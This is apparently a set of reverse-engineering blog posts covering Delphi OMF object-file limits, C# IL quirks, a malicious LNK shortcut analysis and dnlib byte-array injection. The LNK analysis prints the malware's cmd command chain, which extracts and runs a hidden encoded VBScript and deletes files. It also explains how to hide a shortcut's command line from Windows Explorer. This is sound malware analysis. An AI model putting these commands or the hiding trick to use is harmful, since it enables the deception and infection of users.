Linking OMF files with Delphi

kao

Continuing the discussion about the Delphi compiler and object files.

Here is the OMF file template I made for 010 Editor: https://www.mediafire.com/?bkpbkjvgen7ubz1
[screenshot: omf_parser]

Please note, it is not a full-featured implementation of the OMF specification. I only implemented the OMF record types that are processed by the Delphi 2007 compiler. So, next time you get a cryptic compiler error while trying to link an OMF file in Delphi, you can take a look into your OBJ file and make an educated guess about what's causing the problem.

TL;DR version

In 95+% of cases you will encounter an OBJ file that has an unsupported segment name in a SEGDEF record. And it's a simple fix, too - you just need to run objconv.exe by Agner Fog with the -nr option to rename the offending segment. Something like this:

objconv.exe input.obj -nr:BadSegmentName:DATA output.obj

The next possible issue is exceeding the limit on the number of EXTDEF or LNAMES entries - this can happen if you're trying to convert a really large DLL file into an OBJ file.

Finally, your OBJ file might contain some record type which is not supported by the Delphi compiler at all. I'm not aware of a simple way to fix it; I would try using 010 Editor and the OMF template to remove the entire record.

If your problem is not caused by any of the above issues, please feel free to drop me a note - I'll be happy to look into it.

Known limitations of Delphi compiler

This is a list of the limitations I was able to compile and/or confirm. Some of them come from Embarcadero's official notes; the rest I obtained by analyzing dcc32.exe.

SEGDEF (98H, 99H)

  • Not more than 10 segments - if the number of segments exceeds 10, a buffer overrun will probably happen.
  • Segments must be 32-bit. Otherwise the compiler reports "E2215 16-Bit segment encountered in object file '%s'"
  • Segment name must be one of (case insensitive):
    • Code segments: "CODE", "CSEG", "_TEXT"
    • Constant data segments: "CONST", "_DATA"
    • Read-write data segments: "DATA", "DSEG", "_BSS"

    Segment with any other name will be ignored.
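
To check an OBJ file against the SEGDEF rules above without opening a hex editor, something like the following Python sketch could be used. It is not taken from the template; it assumes the usual OMF record layout (type byte, 2-byte little-endian length, payload, checksum byte) and the standard SEGDEF field order, and the function names are made up for illustration.

```python
import struct

# Segment names the list above gives as accepted by Delphi (case insensitive).
ALLOWED_SEGMENTS = {"CODE", "CSEG", "_TEXT", "CONST", "_DATA", "DATA", "DSEG", "_BSS"}


def iter_records(data):
    """Yield (record_type, payload) per OMF record; payload excludes the checksum byte."""
    pos = 0
    while pos + 3 <= len(data):
        rec_type, rec_len = struct.unpack_from("<BH", data, pos)
        body = data[pos + 3 : pos + 3 + rec_len]
        yield rec_type, body[:-1]
        pos += 3 + rec_len


def read_index(buf, pos):
    """Read an OMF index field: one byte, or two bytes when the high bit is set."""
    first = buf[pos]
    if first & 0x80:
        return ((first & 0x7F) << 8) | buf[pos + 1], pos + 2
    return first, pos + 1


def segment_report(data):
    """Return a list of (segment_name, is_32bit, name_is_allowed) tuples."""
    names = [""]  # LNAMES indexes are 1-based, so slot 0 is only a placeholder
    report = []
    for rec_type, body in iter_records(data):
        if rec_type == 0x96:  # LNAMES: a run of length-prefixed strings
            pos = 0
            while pos < len(body):
                n = body[pos]
                names.append(body[pos + 1 : pos + 1 + n].decode("latin-1"))
                pos += 1 + n
        elif rec_type in (0x98, 0x99):  # SEGDEF
            acbp = body[0]
            pos = 1
            if acbp >> 5 == 0:  # absolute segment: frame number and offset follow
                pos += 3
            pos += 4 if rec_type == 0x99 else 2  # skip the segment length field
            name_idx, pos = read_index(body, pos)
            name = names[name_idx] if name_idx < len(names) else "?"
            # Bit 0 of the ACBP byte is the Use32 flag.
            report.append((name, bool(acbp & 1), name.upper() in ALLOWED_SEGMENTS))
    return report
```

Calling segment_report(open("input.obj", "rb").read()) would then list every segment together with two flags; any entry whose last flag is False is a candidate for renaming with objconv.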

LNAMES (96H)

Not more than 50 local names in LNAMES records - will cause "E2045 Bad object file format: '%s'" error.

EXTDEF (8CH)

Not more than 255 external symbols - will cause "E2045 Bad object file format: '%s'"
Certain EXTDEF records can also cause "E2068 Illegal reference to symbol '%s' in object file '%s'" and "E2045 Bad object file format: '%s'"

PUBDEF (90H, 91H)

Can cause "E2045 Bad object file format: '%s'" and "F2084 Internal Error: %s%d"

LEDATA (A0H, A1H)

Embarcadero says that "LEDATA and LIDATA records must be in offset order" - I am not really sure what that means. Can cause "E2045 Bad object file format: '%s'"

LIDATA (A2H, A3H)

Embarcadero says that "LEDATA and LIDATA records must be in offset order" - I am not really sure what that means. Can cause "E2045 Bad object file format: '%s'"

FIXUPP (9CH)

This type of record is unsupported, will cause immediate error "E2103 16-Bit fixup encountered in object file '%s'"

FIXUPP (9DH)

Embarcadero documentation says:

  • No THREAD subrecords are supported in FIXU32 records
  • Only segment and self relative fixups
  • Target of a fixup must be a segment, a group or an EXTDEF

Again I'm not sure what they mean. But there are lots of checks that can cause "E2045 Bad object file format: '%s'"

THEADR (80H)

Accepted by compiler, but no real checks are performed.

LINNUM (94H, 95H)

Accepted by compiler, but no real checks are performed.

MODEND (8AH, 8BH)

Accepted by compiler, but no real checks are performed.

COMMENT (88H) and GRPDEF (9AH)

Ignored by compiler.

That's the end of the list. Any other entry type will cause immediate error "E2045 Bad object file format: '%s'" 🙂
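
The whole list can be turned into a quick pre-flight check. The Python sketch below only looks at record types and counts, not at record contents, and it assumes the same record framing as everywhere else in OMF (type byte, 2-byte length, payload plus checksum). The set of supported types is copied from the list above; scan_omf is a hypothetical helper name.

```python
import struct
from collections import Counter

# Record types that the list above describes as accepted or ignored.
SUPPORTED = {0x80, 0x88, 0x8A, 0x8B, 0x8C, 0x90, 0x91, 0x94, 0x95,
             0x96, 0x98, 0x99, 0x9A, 0x9D, 0xA0, 0xA1, 0xA2, 0xA3}


def scan_omf(data):
    """Return (counts per record type, list of human-readable problems)."""
    counts = Counter()
    problems = []
    pos = 0
    while pos + 3 <= len(data):
        rec_type, rec_len = struct.unpack_from("<BH", data, pos)
        counts[rec_type] += 1
        if rec_type == 0x9C:
            problems.append("offset 0x%04X: 16-bit FIXUPP (9CH)" % pos)
        elif rec_type not in SUPPORTED:
            problems.append("offset 0x%04X: unsupported record %02XH" % (pos, rec_type))
        pos += 3 + rec_len
    segments = counts[0x98] + counts[0x99]
    if segments > 10:
        problems.append("%d SEGDEF records, more than the limit of 10" % segments)
    return counts, problems
```

An empty problems list does not prove the file will link, since most of the E2045 checks depend on record contents, but a non-empty one points straight at the record to inspect in the template.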

Useful links

My OMF file template for 010Editor: https://www.mediafire.com/?bkpbkjvgen7ubz1
OMF file format specification.
The Borland Developer's Technical Guide
Objconv.exe by Agner Fog
Manual for objconv.exe

Weirdness of C# compiler

kao

I've been quite busy lately. I made the OMF file template I promised a few weeks ago, found a remote code execution vulnerability in One Big Company's product and spent some time breaking a keygenme by li0nsar3c00l. I'll make a blog post about most of these findings sooner or later.

But today I want to show you something that made me go WTF..

I needed to see what the loop "while true do nothing" looks like in IL. Since the C# compiler and the .NET JIT compiler are quite smart and optimize code that's certainly an eternal loop, I needed to get creative:

using System;

static class Test
{
  static void bla(Int32 param)
  {
     while (param != 0) {};  // loop loop loop!
     Console.WriteLine("1");
  }

  static void Main()
  {
     bla(123);
  }
}

Nothing fancy, but the C# and JIT compilers don't track param values, so they both generate proper code..

Well, I thought it was proper code, until I looked at the generated MSIL:

.method private hidebysig static void  bla(int32 param) cil managed
  {
    // Code size       28 (0x1c)
    .maxstack  2
    .locals init (bool V_0)
    IL_0000:  nop
    IL_0001:  br.s       IL_0005

    IL_0003:  nop
    IL_0004:  nop
    IL_0005:  ldarg.0
    IL_0006:  ldc.i4.0
    IL_0007:  ceq
    IL_0009:  ldc.i4.0
    IL_000a:  ceq
    IL_000c:  stloc.0
    IL_000d:  ldloc.0
    IL_000e:  brtrue.s   IL_0003

    IL_0010:  ldstr      "1"
    IL_0015:  call       void [mscorlib]System.Console::WriteLine(string)
    IL_001a:  nop
    IL_001b:  ret
  } // end of method Test::bla

WTF WTF WTF? Can anyone explain to me why there are 2 ceq instructions?

I could understand extra nop and stloc/ldloc instructions, but that ceq completely blows my mind.. And it's the same for .NET 2.0 and 4.5 compilers.
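
A possible explanation, offered as an assumption rather than a confirmed answer: IL has ceq, cgt and clt but no "compare not equal" instruction, so an unoptimized "param != 0" may simply be emitted as "(param == 0) == 0", with the second ceq acting as a logical NOT. The small Python sketch below replays the instructions from IL_0005 to IL_000d on an explicit stack to show that the sequence does compute "param != 0"; run_condition is a made-up name.

```python
def run_condition(param):
    """Replay IL_0005..IL_000d and return the value that brtrue.s would test."""
    stack = []
    stack.append(param)                    # ldarg.0
    stack.append(0)                        # ldc.i4.0
    b, a = stack.pop(), stack.pop()
    stack.append(1 if a == b else 0)       # ceq   -> (param == 0)
    stack.append(0)                        # ldc.i4.0
    b, a = stack.pop(), stack.pop()
    stack.append(1 if a == b else 0)       # ceq   -> ((param == 0) == 0)
    v_0 = stack.pop()                      # stloc.0
    return v_0                             # ldloc.0, then consumed by brtrue.s


print(run_condition(123))  # non-zero argument: the loop branch is taken
print(run_condition(0))    # zero argument: execution falls through to WriteLine
```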

I won’t show you

kao

if you come to me with a question, i won’t give you an answer.

if you ask for my advice, i won’t give you a recommendation.

at best i’ll give you a pointer, a suggestion. perhaps a direction, a map. you’ll then start walking, creating your own route, getting lost and finding your way again. you’ll see other people’s footsteps often, some old and some fresh, and sometimes you’ll walk open territories no one has visited before. you’ll meet Eureka and dance together and laugh in joy, you’ll cry with Despair, which is not a bad thing.

if you want a lesson, i won’t give you instruction.

if you want guidance, i won’t show you.

i want you to have fun too. i won’t spoil your journey.

or maybe i just have no idea and this is my fancy excuse to slip away from the situation?

Thank you, el trastero, couldn't have said it any better.

Excuse the mess #2

kao

I'm in the middle of updating the blog to the latest version of WordPress. It's not really a straightforward process, as the new emoji support in WordPress 4.2 causes RSS feeds to stop validating. And there are lots of other tiny but ugly issues with it.

So, please excuse the mess, I'm doing my best to iron out all the remaining wrinkles. 😉 And please let me know if you notice anything wrong with the site, comments or RSS.


Update: looks like all issues are resolved. Enjoy!

Analyzing malicious LNK file

kao

Last week I noticed a month-old post from F-Secure titled "Janicab Hides Behind Undocumented LNK Functionality" in my RSS Reader. I had starred it but never had time to read and analyze it thoroughly. Post title and their statement caught my attention:

But the most interesting part is the use of an undocumented method for hiding the command line argument string from Windows Explorer.

What is this undocumented functionality you're talking about? Tell me more! Unfortunately, they didn't provide any technical details, just some screenshots.

I'm gonna fix that (and have some fun in the process) 🙂

Initial findings and available tools (are crap)

Armed with information from F-Secure's post, I started Googling. In a few minutes I found a VirusTotal scan and, a couple of searches later, the LNK file itself. Now what?

I'm not a LNK file expert and I don't have magic tools for analyzing them. So, I did what everyone else would - Googled again. There are 3 tools that can be found easily:

All of these tools showed the same information as the VirusTotal scan - absolutely nothing useful. See for yourself in the screenshots:
[screenshot: lnk_template_original]

Marked in blue is the final structure of the LNK file, as per the 010 Editor template. COMMAND_LINE_ARGUMENTS are empty. And it looks like the malware authors somehow managed to put the real command line "/c copy *.jpg.lnk..." outside the defined structures, right? How's that possible?

So, I got the official Shell Link (.LNK) Binary File Format specification from Microsoft and started reading.

Fixing 010Editor template

A LNK file consists of a sequence of variable-size structures. There's always the size of the structure, followed by its data. Right after it come the next size and the next data. Size, data, size, data.. It's very easy to process: just look at the size, read the appropriate number of bytes, process them. Repeat until done. How hard is that?
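
As an illustration of the "size, data, size, data" idea, here is a minimal Python sketch for one part of the file, the ExtraData section at the end. It assumes the layout from the Microsoft specification: each block starts with a 4-byte size (which includes the size field itself) and a 4-byte signature, and the list ends with a terminal block whose size value is below 4. The function name is invented for this example.

```python
import struct


def walk_extra_data(buf, offset):
    """Return ([(signature, payload), ...], offset just past the terminal block)."""
    blocks = []
    while offset + 4 <= len(buf):
        (size,) = struct.unpack_from("<I", buf, offset)
        if size < 4:
            # Terminal block: nothing defined by the format follows it.
            offset += 4
            break
        if size < 8 or offset + size > len(buf):
            raise ValueError("malformed block at offset 0x%X" % offset)
        (signature,) = struct.unpack_from("<I", buf, offset + 4)
        blocks.append((signature, buf[offset + 8 : offset + size]))
        # Always advance by the declared size, never by what we happened to parse.
        offset += size
    return blocks, offset
```

Whatever lies between the returned offset and the end of the file is outside every defined structure, which is worth flagging when dealing with a suspicious shortcut.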

Yet, Mr. Stevens (proudly calling himself Microsoft MVP Consumer Security, CISSP, GSSP-C, MCSD .NET, MCSE/Security, MCITP Windows Server 2008, RHCT, CCNP Security, OSWP) managed to mess up his template.

lol

His implementation of LinkInfo structure looks like this:

typedef struct
{
	DWORD LinkInfoSize;
	DWORD LinkInfoHeaderSize;
	LinkInfoFlags sLinkInfoFlags;
	DWORD VolumeIDOffset;
	DWORD LocalBasePathOffset;
	DWORD CommonNetworkRelativeLinkOffset;
	DWORD CommonPathSuffixOffset;
	if (LinkInfoHeaderSize >= 0x00000024 )
	{
		DWORD LocalBasePathOffsetUnicode;
		DWORD CommonPathSuffixOffsetUnicode;
	}
	if (sLinkInfoFlags.VolumeIDAndLocalBasePath == 1)
	{
		VolumeID sVolumeID;
		string LocalBasePath;
		string CommonPathSuffix;
	}
	if (sLinkInfoFlags.CommonNetworkRelativeLinkAndPathSuffix == 1)
	{
		CommonNetworkRelativeLink sCommonNetworkRelativeLink;
	}
} LinkInfo;

He just reads all the fields one after another and expects that the length of all the fields will be equal to the size of structure (LinkInfoSize). Sure, it might work on "normal" LNK files but we're dealing with malware and intentionally modified files here. 😉
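
One way to avoid that mistake, sketched in Python rather than in 010 Editor template syntax: cut out exactly LinkInfoSize bytes first, read the strings through the offsets stored in the header, and continue parsing at start + LinkInfoSize no matter how much of the structure was actually understood. Field order follows the struct above; the helper names and the returned dictionary are assumptions made for this example, and this is not the code of the fixed template.

```python
import struct


def read_cstring(blob, offset):
    """Read a NUL-terminated string that starts at offset inside blob."""
    end = blob.find(b"\x00", offset)
    if end == -1:
        end = len(blob)
    return blob[offset:end].decode("latin-1")


def parse_link_info(buf, start):
    """Return (info dict, offset of the structure that follows LinkInfo)."""
    (size,) = struct.unpack_from("<I", buf, start)
    if size < 0x1C or start + size > len(buf):
        raise ValueError("bad LinkInfoSize")
    blob = buf[start : start + size]  # never look outside the declared size
    header_size, flags, vol_off, base_off, net_off, suffix_off = struct.unpack_from(
        "<6I", blob, 4
    )
    info = {"size": size, "header_size": header_size, "flags": flags}
    # Offsets are relative to the start of LinkInfo; ignore any that point outside it.
    if flags & 1 and 0 < base_off < size:  # VolumeIDAndLocalBasePath
        info["local_base_path"] = read_cstring(blob, base_off)
    if 0 < suffix_off < size:
        info["common_path_suffix"] = read_cstring(blob, suffix_off)
    return info, start + size
```

With this shape, zeroed or padded fields inside LinkInfo can no longer shift the position of the structures that come after it.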

After fixing that and a few more bugs in the template, I was able to see the proper structure of this LNK file:
[screenshot: lnk_template_fixed_overview]
The command line passed to cmd.exe is exactly where it should be, so why is Windows Explorer having problems with it?

Modifications in LNK file

Well, let's look at the file in more detail.

[screenshot: lnk_template_lots_of_zeros_1]
Looks like someone took a hex editor and just filled every possible field in most of the ItemID structures with zeroes.

[screenshot: lnk_template_lots_of_zeros_2]
Same in LinkInfo, lots of zeroes.

[screenshot: lnk_template_lots_of_zeros_3]
And in EnvironmentDataBlock too..

[screenshot: lnk_template_lots_of_zeros_4]
Hmm, this is interesting: 0xA0000000 is not a defined ExtraData structure ID according to the MS spec.

Well, there are lots of changes but which one(-s) are causing the Explorer cockup F-Secure is mentioning? There are two ways to find it - debugging Windows Explorer shell, or making a test LNK file and filling it with zeroes until Explorer breaks. First one would be fun, but second one will be definitely faster. 😉

After a few attempts, I found the culprit: it's the modified EnvironmentDataBlock.

So, now you know. Adding empty EnvironmentDataBlock to any shortcut and setting ShellLinkHeader.LinkFlags.HasExpString = 1 will cause Windows Explorer to hide your command-line (but not exe name) from the user. 😈

Command line magic and steganography

I wanted to finish my analysis but some things were still bugging me.
[screenshot: lnk_template_extra_data]
What is this data after the end-of-file marker? And why is this LNK file 500+KB in size?

The answer is simple - it's using steganography to hide malicious VBScript inside.

Let's look at the commands passed to cmd.exe; I'll just prettify them a bit. To do it properly, you need to know about command prompt escape characters, like "^" (at first I didn't, and F-Secure got it wrong in their blog post, too! 😉 ). These are the actual commands:

copy *.jpg.lnk %tmp%
%systemdrive%
cd %tmp%
dir /b /s *.jpg.lnk>o
echo set /p f=^<o>.bat
echo type "%f%"^>z9>>.bat
echo findstr /R /C:"#@~" z9^>1.vbe^&cscript 1.vbe^&del *.lnk /S /Q /Y>>.bat
.bat

The first few lines copy our LNK file to the TEMP folder. Remember, the F-Secure analysis says that the LNK file was originally called fotomama.jpg.lnk. 😉
The dir command writes the full filename of our evil file into another file named "o".
The echo lines generate the file .bat.
And finally .bat is executed.

So, what is being written into .bat?

set /p f=<o
type "%f%">z9
findstr /R /C:"#@~" z9>1.vbe&cscript 1.vbe&del *.lnk /S /Q /Y
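
The step from the echo arguments to these three lines is just caret removal. A rough Python model of that step is shown below; it assumes the simplified rule that, outside double quotes, "^" makes the next character literal and is itself dropped. Real cmd.exe parsing has more phases (variable expansion, redirection), which this sketch deliberately ignores.

```python
def unescape_carets(text):
    """Drop cmd.exe caret escapes that appear outside double quotes."""
    out = []
    in_quotes = False
    i = 0
    while i < len(text):
        ch = text[i]
        if ch == '"':
            in_quotes = not in_quotes
            out.append(ch)
        elif ch == "^" and not in_quotes and i + 1 < len(text):
            i += 1
            out.append(text[i])  # the escaped character is kept literally
        else:
            out.append(ch)
        i += 1
    return "".join(out)


for arg in ('set /p f=^<o',
            'type "%f%"^>z9',
            'findstr /R /C:"#@~" z9^>1.vbe^&cscript 1.vbe^&del *.lnk /S /Q /Y'):
    print(unescape_carets(arg))
```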

The first 2 lines just copy our evil file to z9. I really don't know why the file copy is done via environment variables; maybe it's some sort of anti-antivirus trick to hide the malware origin.
findstr treats z9 as a text file and copies all "lines" of text that contain "#@~" into the file 1.vbe. If you Google a bit, you'll learn that encoded VBScript files have the extension .vbe, consist of one long string and start with the magic bytes "#@~^".
Then the script gets executed, the LNK file gets deleted and the stupid user ends up being pwned. 🙂

Now, the bytes after end-of-file marker in LNK file start to make sense. 0x0A is new-line that's necessary for findstr, and then comes encrypted VBScript. Nice example of steganography, lots of black command-prompt scripting magic, I really like it! 😉
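
The extraction step is easy to imitate outside of cmd.exe. The Python sketch below treats the whole file as newline-separated "lines" and keeps the ones that contain the marker, which is roughly what the findstr call does. It is only an approximation: how the real findstr copes with NUL bytes and very long lines is not modelled, and the function name is invented.

```python
def extract_marked_lines(data, marker=b"#@~"):
    """Return the newline-delimited chunks of data that contain marker."""
    lines = data.split(b"\n")
    return [line.rstrip(b"\r") for line in lines if marker in line]


# Toy input: binary junk, then 0x0A, then a one-line payload carrying the marker.
sample = b"L\x00\x00\x00binary junk\x00\n#@~^AAAA==payload^#~@\n"
print(extract_marked_lines(sample))
```

This also shows why the single 0x0A byte matters: without it the script would be glued to the preceding binary data and that garbage would end up in 1.vbe as well.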

Decoding the VBE file and analyzing it is a matter for another blog post. Yes, it's really on my todo list.

Fixed LNK Template

I spent a few more evenings working on the LNK template. It was just bugging me to have something so useful, yet so terribly broken. So, I'm happy to present a fully reworked version that should be much more stable and able to deal with malicious LNK files in a much better fashion.

Download link: https://www.mediafire.com/?zvrlmjy9v9m3ed3

Final thoughts

This was a fun evening project. I learned a lot about 010Editor Binary Templates, learned something new about LNK files and got a refresher course in CMD scripting and steganography. Writing this post took much much more time than the actual research, though.

If you want to have some fun too, you can use my 010Editor Template to edit your LNK files. Or make a simple tool in C#. Or create a LNK obfuscation service webpage in PHP. Possibilities are endless! 🙂

Obviously I won't give out a link to the actual malware (if Google is your friend, you can find it anyway) but here's a demo LNK file I put together just for fun: http://www.mediafire.com/?gmphyn0mkmmyuag

It's harmless, trust me! 😀

Useful links

F-Secure post that started my adventure
Original LNK Template
Official LNK specification by Microsoft
Overview of LNK file data that are useful for computer forensics

Since you asked.. How to inject byte array using dnlib

kao

Quite often I receive random questions about dnlib from my friends. To be honest, I have no idea why they think I know the answers to life, the universe and everything else. 🙂 So, in this series of posts I'll attempt to solve their problems - and hope that the solution helps someone else too.

So, today's question is:

We're trying to add a byte array to an assembly using dnlib. We wrote some code* but dnlib throws exception when saving modified assembly:
An unhandled exception of type 'dnlib.DotNet.Writer.ModuleWriterException' occurred in dnlib.dll
Additional information: Field System.Byte[] ::2026170854 (04000000) initial value size != size of field type

I gave the friend the standard answer - make a sample app, see how it looks and then implement it with dnlib. Seriously, how hard can it be? 🙂

Well, array initialization in .NET is anything but simple.

How arrays are initialized in C#

Note - the following explanation is shamelessly copied from "Maximizing .NET Performance" by Nick Wienholt. It's a very nice book but it's getting a little outdated. You can Google for "Apress.Maximizing.Dot.NET.Performance.eBook-LiB", if interested.

Value type array initialization in C# can be achieved in two distinct ways—inline with the array variable declaration, and through set operations on each individual array element, as shown in the following snippet:

//inline
int[] arrInline = new int[]{0,1,2};

//set operation per element
int[] arrPerElement = new int[3];
arrPerElement[0] = 0;
arrPerElement[1] = 1;
arrPerElement[2] = 2;

For a value type array that is initialized inline and has more than three elements, the C# compiler in both .NET 1.0 and .NET 1.1 generates a type named <PrivateImplementationDetails> that is added to the assembly at the root namespace level. This type contains nested value types that reference the binary data needed to initialize the array, which is stored in a .data section of the PE file. At runtime, the System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray method is called to perform a memory copy of the data referenced by the <PrivateImplementationDetails> nested structure into the array's memory location. The direct memory copy is roughly twice as fast for the initialization of a 20-by-20 element array of 64-bit integers, and array initialization syntax is generally cleaner for the inline initialization case.

Say what? You can read the text 3 times and still be no wiser. So, let's make a small sample application and disassemble it.

How array initialization looks in MSIL

Let's start with sample app that does nothing.

using System;
class Program
{
    static byte[] bla = new byte[] {1,2,3,4,5};
    static void Main()
    {
    }
}

Compile without optimizations and disassemble using ildasm. Even after removing all the extra stuff, there's still a lot of code & metadata for such a simple thing. 🙂

.assembly hello {}

.class private auto ansi beforefieldinit Program extends [mscorlib]System.Object
{
  .field public static uint8[] bla

  .method private hidebysig specialname rtspecialname static void  .cctor() cil managed
  {
    ldc.i4.5
    newarr     [mscorlib]System.Byte
    dup
    ldtoken    field valuetype '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}'/'__StaticArrayInitTypeSize=5' '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}'::'$$method0x6000003-1'
    call       void [mscorlib]System.Runtime.CompilerServices.RuntimeHelpers::InitializeArray(class [mscorlib]System.Array, valuetype [mscorlib]System.RuntimeFieldHandle)
    stsfld     uint8[] Program::bla
    ret
  }
}

.data cil I_00002098 = bytearray (01 02 03 04 05) 

.class private auto ansi '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}' extends [mscorlib]System.Object
{
  .custom instance void [mscorlib]System.Runtime.CompilerServices.CompilerGeneratedAttribute::.ctor() = ( 01 00 00 00 ) 
  .class explicit ansi sealed nested private '__StaticArrayInitTypeSize=5' extends [mscorlib]System.ValueType
  {
    .pack 1
    .size 5
  }

  .field static assembly valuetype '<PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904}'/'__StaticArrayInitTypeSize=5' '$$method0x6000003-1' at I_00002098
}

For the one byte array that we declared, the compiler created a .data directive, 2 static fields, one class and one nested class. And it added a static constructor (.cctor) to Program. Yikes!

Implementing it in dnlib

Now that we know all the stuff that's required for an array, we can make a tool that will add byte array to an assembly of our choice. To make things simpler, I decided not to create a holder class (named <PrivateImplementationDetails>{E21EC13E-4669-42C8-B7A5-2EE7FBD85904} in the example) and put everything in global module instead.

Note - Since I'm not a .NET/dnlib wizard, I always do it one step at a time, make sure it works and then continue. So, my workflow looks like this: write code that does X → compile and run it → disassemble the result → verify that result X matches the expected → fix the bugs and repeat. Only after I've tested one thing do I move to the next one.

It also helps to make a small test program first. Once you know that your code works as intended, you can use it in a larger project. Debugging the entire ConfuserEx project just to find a small bug in modifications made by someone else is not fun! So, step-by-step...

First, we need to add the class with layout. It's called '__StaticArrayInitTypeSize=5' in the example above. That's quite simple to do in dnlib:

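// Needs: using dnlib.DotNet; using dnlib.DotNet.Emit; using System.Collections.Generic;
ModuleDefMD mod = ModuleDefMD.Load(args[0]);
Importer importer = new Importer(mod);
ITypeDefOrRef valueTypeRef = importer.Import(typeof(System.ValueType));
// The single quotes shown by ildasm are only its quoting syntax, not part of the metadata name.
TypeDef classWithLayout = new TypeDefUser("__StaticArrayInitTypeSize=5", valueTypeRef);
classWithLayout.Attributes |= TypeAttributes.Sealed | TypeAttributes.ExplicitLayout;
// PackingSize = 1, ClassSize = 5: the class size must match the number of bytes in the array data.
classWithLayout.ClassLayout = new ClassLayoutUser(1, 5);
mod.Types.Add(classWithLayout);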

Now we need to add the static field with data, called '$$method0x6000003-1'.

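// Static field typed as the 5-byte struct; HasFieldRVA marks it as backed by raw data in the PE file.
FieldDef fieldWithRVA = new FieldDefUser("$$method0x6000003-1", new FieldSig(classWithLayout.ToTypeSig()), FieldAttributes.Static | FieldAttributes.Assembly | FieldAttributes.HasFieldRVA);
// The InitialValue length has to equal the ClassLayout size (5), otherwise dnlib reports
// "initial value size != size of field type" when the module is written.
fieldWithRVA.InitialValue = new byte[] {1,2,3,4,5};
mod.GlobalType.Fields.Add(fieldWithRVA);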

Once that is done, we can add our byte array field, called bla in the example.

ITypeDefOrRef byteArrayRef = importer.Import(typeof(System.Byte[]));
FieldDef fieldInjectedArray = new FieldDefUser("bla", new FieldSig(byteArrayRef.ToTypeSig()), FieldAttributes.Static | FieldAttributes.Public);
mod.GlobalType.Fields.Add(fieldInjectedArray);

That's it, we have all the fields. Now we need to add code to global .cctor to initialize the array properly.

ITypeDefOrRef systemByte = importer.Import(typeof(System.Byte));
ITypeDefOrRef runtimeHelpers = importer.Import(typeof(System.Runtime.CompilerServices.RuntimeHelpers));
IMethod initArray = importer.Import(typeof(System.Runtime.CompilerServices.RuntimeHelpers).GetMethod("InitializeArray", new Type[] { typeof(System.Array), typeof(System.RuntimeFieldHandle) }));

MethodDef cctor = mod.GlobalType.FindOrCreateStaticConstructor();
IList<Instruction> instrs = cctor.Body.Instructions;
instrs.Insert(0, new Instruction(OpCodes.Ldc_I4, 5));
instrs.Insert(1, new Instruction(OpCodes.Newarr, systemByte));
instrs.Insert(2, new Instruction(OpCodes.Dup));
instrs.Insert(3, new Instruction(OpCodes.Ldtoken, fieldWithRVA));
instrs.Insert(4, new Instruction(OpCodes.Call, initArray));
instrs.Insert(5, new Instruction(OpCodes.Stsfld, fieldInjectedArray));

And that's it! Simples!

Further reading

Commented demo code at Pastebin
Longer explanation how array initialization works in C#


Updates

Just to clarify - this is sample code. It works for me but if it blows up in your project, it's your problem. And there are always some things that can be improved.

• Sometimes I'm overcomplicating things.. You don't need to explicitly import System.Byte, you can use mod.CorLibTypes.Byte for that.

instrs.Insert(1, new Instruction(OpCodes.Newarr, mod.CorLibTypes.Byte.ToTypeDefOrRef()));

• SZArraySig is a cleaner but less obvious way to refer to any array. If you need to reference complex arrays, this is better:

FieldDef fieldInjectedArray = new FieldDefUser("bla", new FieldSig(new SZArraySig(mod.CorLibTypes.Byte)), FieldAttributes.Static | FieldAttributes.Public);
mod.GlobalType.Fields.Add(fieldInjectedArray);